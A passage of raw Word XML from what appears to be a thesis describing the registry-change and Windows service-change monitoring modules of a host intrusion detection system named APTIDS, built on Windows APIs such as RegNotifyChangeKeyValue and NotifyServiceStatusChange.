        <w:t>RegMon reads essential Registry keys in a configuration file called “RegConfig.conf”. Those keys are predefined Registry keys that an administrator want APTIDS to perform its real-time monitor on. RegConfig.conf is a plaintext file which has a XML-like format in which key is stored between an opening tag “&lt;Key&gt;” and a closing tag “&lt;/Key&gt;”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>After receiving information about which key to monitor, RegMon passes the information to a function called “RegMonitor” for performing real-time monitor operations.</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve"> RegMon creates and handles each separated thread, which take RegMonitor as thread function, for each key defined in RegConfig.conf. For example, if there are 4 registry keys defined, RegMon creates 4 independent RegMonitor thread, each for a monitor key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C6026" w:rsidRPr="00362FBB" w:rsidRDefault="0082423F" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RegMonitor</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve"> thread passed the Registry Key information to </w:t>
      </w:r>
      <w:r>
        <w:t>“RegQuery”</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which is a function that reads into the registry keys and queries the current Registry Key information and value data. </w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve">At that time, RegMonitor set a special argument (which is defined to indicate whether there is any change happened) to be </w:t>
      </w:r>
      <w:r w:rsidR="000B664D" w:rsidRPr="000B664D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve"> to tell RegQuery that there was not any change happened in the Registry for this current call. Therefore, RegQuery read the </w:t>
      </w:r>
      <w:r w:rsidR="00362FBB">
        <w:t>specified key information and return</w:t>
      </w:r>
      <w:r w:rsidR="0039660C">
        <w:t>s to RegMonitor</w:t>
      </w:r>
      <w:r w:rsidR="00362FBB">
        <w:t xml:space="preserve"> the number of subkeys along with the number of values stored in that key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362FBB" w:rsidRDefault="00B46827" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>RegMonitor calls a Windows API named “RegNotifyChangeKeyValue”, which API runs as a separated thread and waiting for any change event that happened in the specified Registry (detail about “RegNotifyChange KeyValue” will be discussed late</w:t>
      </w:r>
      <w:r w:rsidR="00CD4CB3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2A6F" w:rsidRDefault="003E2A6F" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>RegNotifyChangeKeyValue receive an argument for a handle Windows Event. That event handle will</w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ed, along to the flow control of the running process, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>to a Windows API called “WaitForSingleObject” to wait for change happened. When change happe</w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>, WaiforSingleObject return and handle the flow control back to RegMonitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2A6F" w:rsidRDefault="00B46827" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">When any change takes place in the specified Registry key that is indicated by RegNotifyChangeKeyValue, RegMonitor now set the special argument to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> and calls RegQuery to get the information of that changed key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2A6F" w:rsidRDefault="003E2A6F" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RegQuery then compare the number of keys and values that returned from step 4 to the number of current keys and values. In case there is a key or value added, based on the working concept of Windows Registry in Chapter 2, that new key or value should be added to the last chain of storing keys or values. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Therefore, to read the added information, we only need to read the final information of key or value in the appropriated key or value chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46827" w:rsidRDefault="003E2A6F" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>After identifying which change occur to the Registry, RegQuery calls “WriteLog” which is a function for writing Registry Monitor logs into system disk and then sends log to the distributed log collector hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51A1A" w:rsidRDefault="00C51A1A" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>When finishing writing log, RegQuery return to RegMonitor to start again at step 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46827" w:rsidRPr="00B46827" w:rsidRDefault="00A753E4" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc485303729"/>
      <w:r>
        <w:t>Identifying Registry Change</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="00A753E4" w:rsidRDefault="00A753E4" w:rsidP="00A753E4">
      <w:r>
        <w:t>For identifying added key or value in Registry, RegQuery performs the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4B82" w:rsidRDefault="008B4B82" w:rsidP="008B4B82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When calling RegQuery, RegMonitor declare a variable called “aft” which stands for “After”. At the first called, RegMonitor set “aft” to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indicates that this is the first call for query the number of subkeys and values. The key is now separated into the hive and the key of that hive, both are also passed to RegQuery by RegMonitor. By defined of RegMon, each RegMonitor is responsible for a key, which is passed to </w:t>
      </w:r>
      <w:r w:rsidR="00387B49">
        <w:t>RegQuery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4B82" w:rsidRPr="008B4B82" w:rsidRDefault="00A753E4" w:rsidP="00A753E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At the first time RegQuery reads in the Registry key </w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>for its subkeys and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values, RegQuery return</w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> two integer values: a value that identifies the number of </w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ubkeys belong to that key and a value identifies the nu</w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>mber of v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alues belong to that key. </w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>We called these two values as the names “nSubkeys” and “nValues”.</w:t>
      </w:r>
      <w:r w:rsidR="00E7062B">
        <w:t xml:space="preserve"> Along with these values, RegQuery also return names of the last subkey and value in chain. </w:t>
      </w:r>
      <w:r w:rsidR="0037653E">
        <w:t>Since Configuration Manager store registry keys in chain of bins and cells, query the last value in chain let us know the last thing that has been added to that key or value chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B49" w:rsidRPr="00387B49" w:rsidRDefault="008B4B82" w:rsidP="00A753E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When change takes place, RegMonitor calls RegQuery again, “aft” is now set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indicates that there was any change happened to the monitoring keys.</w:t>
      </w:r>
      <w:r w:rsidR="00EE76F2">
        <w:t xml:space="preserve"> RegQuery now queries the specified registry key again to get the current number of subkeys and values, stores in “cSubkeys” and “cValues”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE76F2" w:rsidRPr="00EE76F2" w:rsidRDefault="00B82687" w:rsidP="00EE76F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RegQuery checks for identifying </w:t>
      </w:r>
      <w:r w:rsidR="00EE76F2">
        <w:t>registry change as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE76F2" w:rsidRPr="00EE76F2" w:rsidRDefault="00EE76F2" w:rsidP="00EE76F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If cSubkeys &gt; nSubkeys, there was a subkey added to the specified key. Also check whether cValues &gt; nValues. For getting the added value or subkey, just get the last subkey or value in the subkey or value chain, using APIs as RegEnumKeyEx or RegEnumValue. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0348" w:rsidRPr="00FC0348" w:rsidRDefault="00FC0348" w:rsidP="00FC0348">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>If cSubkeys == nSubkeys, RegQuery checks whether the name of the last subkey in chain match the name return in the previous query. If they do not match, a change has happened and RegQuery query the last subkey in chain which is the subkey has been changed. RegQuery also do that for key’s values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0348" w:rsidRPr="00FC0348" w:rsidRDefault="00FC0348" w:rsidP="00FC0348">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Finally, if cSubkeys &lt; nSubkeys, a subkey was deleted. RegQuery do nothing in this case.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5563" w:rsidRDefault="003D5563" w:rsidP="003D5563">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The following graphically demonstrates the mechanism for detecting changes in Registry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063A1C" w:rsidRDefault="00063A1C" w:rsidP="00063A1C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4254E7BA" wp14:editId="649E0FF2">
            <wp:extent cx="5581650" cy="7451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1650" cy="7451090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B664D" w:rsidRPr="00E819FF" w:rsidRDefault="00063A1C" w:rsidP="00D5205D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc485303773"/>
      <w:r w:rsidRPr="00063A1C">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3</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3</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mechanism for detecting change in registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc485303730"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00672188">
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E819FF" w:rsidRDefault="005250D5" w:rsidP="00E819FF">
      <w:r>
        <w:t xml:space="preserve">The primary purpose of malwares, whether their main tasks could be different, is to remain persistent in the compromised systems. </w:t>
      </w:r>
      <w:r w:rsidR="00730D2E">
        <w:t xml:space="preserve">There are lots of way to remain silently in systems without being easily detected as storing configuration in registry, creating a task in task scheduler, overwriting system files those start when system boots, etc. </w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t xml:space="preserve">But what makes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D5205D">
        <w:t>really excited</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D5205D">
        <w:t xml:space="preserve"> is the Windows Service that stores service for programs those want to persistently run when system boots up, whether there is a user log</w:t>
      </w:r>
      <w:r w:rsidR="007D6443">
        <w:t>ged</w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t xml:space="preserve"> in or not. </w:t>
      </w:r>
      <w:r w:rsidR="00D32ED3">
        <w:t xml:space="preserve">Furthermore, Windows Service also stores entries for device services, which means we can also detect rootkits in </w:t>
      </w:r>
      <w:r w:rsidR="00672188">
        <w:t>some viewpoints, those are running and store their boot-up information as device services. Since the concept of this thesis does not include rootkit detecting techniques, but when we monitor Windows Service, we can also capture and recognize some rootkits activities running in kernel mode based on device services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672188" w:rsidRDefault="00672188" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc485303731"/>
      <w:r>
        <w:t>Service Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="00672188" w:rsidRDefault="00EA4E51" w:rsidP="00672188">
      <w:r>
        <w:t>The Service Monitor Architecture is graphically demonstrated in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E646DE" w:rsidRDefault="007D52D3" w:rsidP="00E646DE">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735DFC10" wp14:editId="1A21CF42">
            <wp:extent cx="5581650" cy="34023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650" cy="3402330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4E51" w:rsidRPr="00E646DE" w:rsidRDefault="00E646DE" w:rsidP="00E646DE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc485303774"/>
      <w:r w:rsidRPr="00E646DE">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3</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4</w:t>
      </w:r>
      <w:r w:rsidR="00377E30">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E646DE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="00672188" w:rsidRPr="00672188" w:rsidRDefault="00CF22DD" w:rsidP="00672188">
      <w:r>
        <w:t>APTIDS.exe run in the background of operating systems, it creates an individual thread for calling “SvcChangeNotify”</w:t>
      </w:r>
      <w:r w:rsidR="00D90AA0">
        <w:t>, a function for monitoring and capture change in case there are both insertion or deletion of Windows Services entries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRPr="00DE075B" w:rsidRDefault="00D90AA0" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc485303732"/>
      <w:r w:rsidRPr="00DE075B">
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor Workflows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:r>
        <w:t>SvcChangeNotify runs in background as an independent thread which performs real-time Service Monitor operations (as demonstrated in figure 3.3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>APTIDS.exe calls SvcChangeNotify as a separated thread for performing Windows Service change notification.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When startup, SvcChangeNotify must get a windows handle </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1785957948"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mar09 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(21)</w:t>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> for the Service Control Manager (SCM), the handle then allows SvcChangeNotify</w:t>
      </w:r>
      <w:r w:rsidR="007D52D3">
        <w:t xml:space="preserve"> to create an access to SCM and monitor any activity occurs in the Services Database. For getting the handle, SvcChangeNotify call a Windows API named “OpenSCManager” and pass a special DWORD argument defined as “SC_MANAGER_ENUMERATE_SERVICE”. OpenSCManager now returns a handle that allow any Windows API using this handle can access and enumerate all Windows Service in SCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D52D3" w:rsidRDefault="001D11AB" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SvcChangeNotify using this handle to calls “NotifyServiceStatusChange”, a windows API for notifying any change that SCM handle. SvcChangeNotify also specifies a Windows Event for NotifyServiceStatusCh</w:t>
      </w:r>
      <w:r w:rsidR="003813AA">
        <w:t>ange at which whenever an event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> happened in SCM, that Windows Event will be set and used for capturing the occurring SCM event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D11AB" w:rsidRDefault="001D11AB" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The Service Monitor Module now waiting for any SCM activities occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901234" w:rsidRDefault="001D11AB" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When an SCM activity occurs, and since the concept is to capture any service that is deleted or inserted, the function “NotifyCallback” is call</w:t>
      </w:r>
      <w:r w:rsidR="00901234">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to check whether there </w:t>
      </w:r>
      <w:r w:rsidR="00901234">
        <w:t xml:space="preserve">is an inserted or deleted service. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D11AB" w:rsidRDefault="00901234" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bases on the activities occur to the service, NotifyCallback calls “WriteLog” for writing out service change logs and sends logs to distributed log collector hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4649" w:rsidRDefault="005C4649" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
